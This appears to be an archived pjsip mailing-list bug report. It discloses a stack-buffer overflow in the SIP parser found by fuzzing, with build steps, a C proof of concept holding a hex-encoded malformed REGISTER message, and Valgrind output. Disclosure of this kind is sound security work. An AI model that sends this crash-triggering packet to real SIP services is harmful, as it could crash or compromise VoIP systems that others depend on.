Stack-buffer overflow in pj_scan_get_until_ch

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

Dear all —

Please find attached a sample program that parses a SIP message using pjsip_parse_msg. This programs causes a stack-buffer overflow.

# Version

trunk

# How to reproduce pjsip_multipart_parse overflow:

$ clang -o out pj_scan_get_until_ch pjsip/lib/libpjsip-x86_64-unknown-linux-gnu.a pjlib-util/lib/libpjlib-util-x86_64-unknown-linux-gnu.a pjlib/lib/libpj-x86_64-unknown-linux-gnu.a -Ipjlib/include/ -Ipjlib-util/include/ -Ipjsip/include -lpthread -lm -luuid

$ valgrind ./out

The resulting valgrind output is attached.

I've detected the issue with afl-fuzz in ASAN mode.

Cheers

    -Stephan Zeisberg

#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <pjlib.h>
#include <pjlib-util.h>
#include <pjsip.h>

pj_caching_pool caching_pool;
pjsip_endpoint *endpt;

int main(void) {
  pj_pool_t *pool;
  pj_size_t msg_size;
  pj_status_t rc;
  pjsip_parser_err_report err_list;

  rc = pj_init();
  pj_list_init(&err_list);

  pj_caching_pool_init( &caching_pool, &pj_pool_factory_default_policy,
			  (2*1024*1024) );

  rc = pjsip_endpt_create(&caching_pool.factory, "endpt", &endpt);

  if (rc != PJ_SUCCESS) {
	   pj_caching_pool_destroy(&caching_pool);
	   return rc;
  }

	pool = pjsip_endpt_create_pool(endpt, NULL, 800, 800);

  char packet [] ="\x52\x45\x47\x49\x53\x54\x45\x52\x20\x73\x69\x70\x3A\x31\x39\x32"
    "\x32\x20\x53\x49\x50\x2F\x32\x2E\x30\x0D\x0A\x56\x69\x61\x3A\x20"
    "\x53\x49\x50\x2F\x32\x2E\x30\x2F\x55\x44\x50\x20\x31\x3A\x31\x33"
    "\x34\x33\x34\x3B\x62\x72\x61\x6E\x63\x68\x3D\x7A\x7A\x2D\x3B\x72"
    "\x70\x6F\x72\x74\x0D\x0A\x4D\x61\x78\x2D\x46\x6F\x72\x77\x61\x72"
    "\x64\x73\x3A\x20\x37\x30\x0D\x0A\x43\x6F\x6E\x74\x61\x63\x74\x3A"
    "\x20\x3C\x73\x69\x70\x3A\x31\x30\x30\x30\x3B\x40\x31\x39\x32\x2E"
    "\x31\x3A\x31\x33\x34\x33\x34\x3B\x72\x69\x6E\x73\x74\x61\x6E\x63"
    "\x65\x3D\x33\x30\x39\x63\x33\x65\x35\x38\x37\x39\x38\x64\x35\x66"
    "\x36\x39\x3E\x0D\x0A\x54\x6F\x3A\x20\x22\x50\x68\x70\x65\x63\x32"
    "\x22\x3C\x73\x69\x70\x3A\x31\x30\x30\x30\x39\x40\x31\x39\x32\x2E"
    "\x31\x36\x38\x2E\x31\x30\x2E\x32\x3E\x0D\x0A\x46\x72\x6F\x6D\x3A"
    "\x20\x22\x3C\x68\x69\x6C\x69\x70\x70\x65\x63\x32\x22\x3C\x73\x69"
    "\x70\x3A\x31\x30\x30\x30\x39\x40\x31\x39\x32\x2E\x31\x36\x38\x2E"
    "\x31\x30\x2E\x32\x3E\x3B\x74\x61\x67\x3D\x36\x35\x66\x39\x32\x63"
    "\x65\x64\x0D\x0A\x43\x61\x6C\x6C\x2D\x49\x44\x3A\x20\x4D\x32\x4E"
    "\x68\x5A\x44\x41\x7A\x4D\x54\x6B\x2E\x0D\x0A\x43\x53\x65\x71\x3A"
    "\x20\x31\x20\x52\x45\x47\x49\x53\x54\x45\x52\x0D\x0A\x45\x78\x70"
    "\x69\x72\x65\x73\x3A\x20\x33\x36\x30\x30\x0D\x0A\x41\x6C\x6C\x6F"
    "\x77\x3A\x20\x49\x4E\x56\x49\x54\x45\x2C\x20\x41\x43\x4B\x2C\x20"
    "\x43\x41\x4E\x43\x45\x4C\x2C\x20\x4F\x50\x54\x49\x4F\x4E\x53\x2C"
    "\x20\x42\x59\x45\x2C\x20\x52\x45\x53\x54\x45\x52\x20\x73\x69\x70"
    "\x3A\x31\x7F\xFF\xFF\xFF\x53\x49\x50\x2F\x32\x2E\x30\x0D\x0A\x56"
    "\x69\x61\x3A\x20\x53\x49\x50\x2F\x32\x2E\x30\x2F\x55\x44\x50\x20"
    "\x31\x3A\x31\x33\x34\x33\x34\x3B\x62\x72\x61\x6E\x63\x68\x3D\x7A"
    "\x7A\x2D\x3B\x72\x70\x6F\x72\x74\x0D\x0A\x4D\x61\x78\x2D\x46\x6F"
    "\x72\x77\x61\x72\x64\x73\x3A\x20\x37\x30\x0D\x0A\x43\x6F\x6E\x74"
    "\x61\x63\x74\x3A\x20\x3C\x73\x69\x70\x3A\x31\x30\x30\x30\x39\x40"
    "\x31\x39\x32\x2E\x31\x36\x38\x2E\x31\x30\x2E\x34\x31\x3A\x31\x33"
    "\x34\x33\x34\x3B\x72\x69\x6E\x73\x74\x61\x6E\x63\x65\x3D\x33\x30"
    "\x39\x63\x33\x65\x35\x38\x37\x39\x38\x64\x35\x66\x36\x39\x3E\x0D"
    "\x0A\x54\x6F\x3A\x20\x22\x50\x68\x70\x65\x63\x32\x22\x3C\x73\x69"
    "\x70\x3A\x31\x30\x30\x30\x39\x40\x31\x39\x32\x2E\x31\x36\x38\x2E"
    "\x31\x30\x2E\x32\x3E\x0D\x0A\x46\x72\x6F\x6D\x3A\x20\x22\x50\x68"
    "\x22\x3C\x73\x69\x70\x3A\x31\x30\x30\x30\x39\x40\x31\x39\x32\x2E"
    "\x31\x36\x38\x2E\x31\x30\x2E\x32\x3E\x3B\x74\x61\x67\x3D\x36\x35"
    "\x66\x39\x32\x63\x65\x64\x0D\x0A\x43\x61\x6C\x6C\x2D\x49\x44\x3A"
    "\x20\x4D\x32\x4E\x68\x5A\x44\x41\x7A\x4D\x54\x6B\x2E\x2B\x0A\x43"
    "\x53\x65\x71\x3A\x20\x31\x20\x52\x45\x47\x49\x53\x5F\x45\x52\x0D"
    "\x0A\x45\x7E\x70\x69\x72\x65\x73\x3A\x20\x33\x36\x30\x30\x0D\x0A"
    "\x41\x6C\x6C\x6F\x77\x3A\x20\x49\x5B\x56\x49\x54\x45\x2C\x20\x41"
    "\x43\x4B\x2C\x20\x70\x74\x3A\x20\x74\x65\x78\x74\x2F\x68\x74\x6D"
    "\x6C\x2C\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78"
    "\x68\x74\x6D\x6C\x2B\x78\x6D\x6C\x2C\x20\x61\x70\x70\x6C\x69\x2C"
    "\x20\x2A\x2F\x2A\x3B\x71\x3D\x30\x2E\x38\x0D\x0A\x4D\x69\x6E\x2D"
    "\x45\x78\x70\x69\x72\x65\x73\x3A\x20\x36\x30\x0D\x0A\x52\x65\x71"
    "\x75\x69\x72\x65\x3A\x20\x31\x30\x30\x72\x65\x6C\x0D\x0A\x52\x65"
    "\x74\x72\x79\x2D\x41\x66\x74\x65\x72\x3A\x20\x31\x38\x30\x30\x30"
    "\x3B\x64\x75\x72\x61\x74\x69\x6F\x6E\x3D\x33\x36\x30\x30\x0D\x0A"
    "\x52\x7A\x74\x72\x79\x2D\x41\x66\x74\x73\x69\x70\x3A\x73\x65\x72"
    "\x76\x65\x72\x31\x30\x2E\x62\x69\x6C\x6F\x78\x69\x2E\x63\x6F\x6D"
    "\x3B\x6C\x72\x3E\x0D\x0A\x52\x65\x63\x6F\x72\x78\x2D\x52\x6F\x75"
    "\x74\x65\x3A\x20\x3C\x73\x69\x6C\x43\x53\x65\x71\x61\x6E\x74\x61"
    "\x2E\x63\x6F\x6D\x3B\x6C\x72\x74\x65\x6E\x74\x2D\x54\x79\x70\x65"
    "\x3A\x20\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D"
    "\x2D\x64\x61\x74\x61\x3B\x20\x62\x6F\x75\x6E\x64\x61\x72\x62\x72"
    "\x61\x6E\x30\x0D\x0A\x56\x69\x61\x3A\x20\x53\x49\x50\x2F\x32\x2E"
    "\x30\x2F\x55\x44\x50\x20\x31\x3A\x31\x33\x34\x33\x34\x28\x62\x72"
    "\x61\x6E\x63\x68\x3D\x7A\x7A\x2D\x3B\x72\x70\x6F\x72\x74\x0D\x0A"
    "\x4D\x61\x78\x2D\x46\x6F\x72\x77\x61\x72\x64\x73\x50\x50\x50\x50"
    "\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
    "\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
    "\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
    "\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50";

  pjsip_parse_msg(pool, packet, sizeof(packet), &err_list);

  return 0;
}

==1926== Memcheck, a memory error detector
==1926== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1926== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==1926== Command: ./out
==1926== 
17:56:42.428         os_core_unix.c !pjlib 2.7-svn for POSIX initialized
17:56:42.471         sip_endpoint.c  Creating endpoint instance...
17:56:42.526                  pjlib  select() I/O Queue created (0x59a6dd0)
17:56:42.529         sip_endpoint.c  Module "mod-msg-print" registered
17:56:42.532        sip_transport.c  Transport manager created.
==1926== Conditional jump or move depends on uninitialised value(s)
==1926==    at 0x419608: pj_scan_get_until_ch (in /tmp/out)
==1926==    by 0x4059B2: parse_hdr_via (in /tmp/out)
==1926==    by 0x403604: int_parse_msg (in /tmp/out)
==1926==    by 0x4032F3: pjsip_parse_msg (in /tmp/out)
==1926==    by 0x40259E: main (in /tmp/out)
==1926== 
==1926== Conditional jump or move depends on uninitialised value(s)
==1926==    at 0x41962F: pj_scan_get_until_ch (in /tmp/out)
==1926==    by 0x4059B2: parse_hdr_via (in /tmp/out)
==1926==    by 0x403604: int_parse_msg (in /tmp/out)
==1926==    by 0x4032F3: pjsip_parse_msg (in /tmp/out)
==1926==    by 0x40259E: main (in /tmp/out)
==1926== 
==1926== Conditional jump or move depends on uninitialised value(s)
==1926==    at 0x4196B5: pj_scan_get_until_ch (in /tmp/out)
==1926==    by 0x4059B2: parse_hdr_via (in /tmp/out)
==1926==    by 0x403604: int_parse_msg (in /tmp/out)
==1926==    by 0x4032F3: pjsip_parse_msg (in /tmp/out)
==1926==    by 0x40259E: main (in /tmp/out)
==1926== 
==1926== Conditional jump or move depends on uninitialised value(s)
==1926==    at 0x4196BA: pj_scan_get_until_ch (in /tmp/out)
==1926==    by 0x4059B2: parse_hdr_via (in /tmp/out)
==1926==    by 0x403604: int_parse_msg (in /tmp/out)
==1926==    by 0x4032F3: pjsip_parse_msg (in /tmp/out)
==1926==    by 0x40259E: main (in /tmp/out)
==1926== 
==1926== Conditional jump or move depends on uninitialised value(s)
==1926==    at 0x419309: pj_scan_get_char (in /tmp/out)
==1926==    by 0x4059BA: parse_hdr_via (in /tmp/out)
==1926==    by 0x403604: int_parse_msg (in /tmp/out)
==1926==    by 0x4032F3: pjsip_parse_msg (in /tmp/out)
==1926==    by 0x40259E: main (in /tmp/out)
==1926== 
==1926== 
==1926== HEAP SUMMARY:
==1926==     in use at exit: 83,520 bytes in 19 blocks
==1926==   total heap usage: 28 allocs, 9 frees, 90,804 bytes allocated
==1926== 
==1926== LEAK SUMMARY:
==1926==    definitely lost: 0 bytes in 0 blocks
==1926==    indirectly lost: 0 bytes in 0 blocks
==1926==      possibly lost: 0 bytes in 0 blocks
==1926==    still reachable: 83,520 bytes in 19 blocks
==1926==         suppressed: 0 bytes in 0 blocks
==1926== Rerun with --leak-check=full to see details of leaked memory
==1926== 
==1926== For counts of detected and suppressed errors, rerun with: -v
==1926== Use --track-origins=yes to see where uninitialised values come from
==1926== ERROR SUMMARY: 5 errors from 5 contexts (suppressed: 0 from 0)

_______________________________________________
Visit our blog: http://blog.pjsip.org

pjsip mailing list
pjsip@xxxxxxxxxxxxxxx
http://lists.pjsip.org/mailman/listinfo/pjsip_lists.pjsip.org
[Index of Archives]     [Asterisk Users]     [Asterisk App Development]     [Linux ARM Kernel]     [Linux ARM]     [Linux Omap]     [Fedora ARM]     [IETF Annouce]     [Security]     [Bugtraq]     [Linux]     [Linux OMAP]     [Linux MIPS]     [Linux API]
  Powered by Linux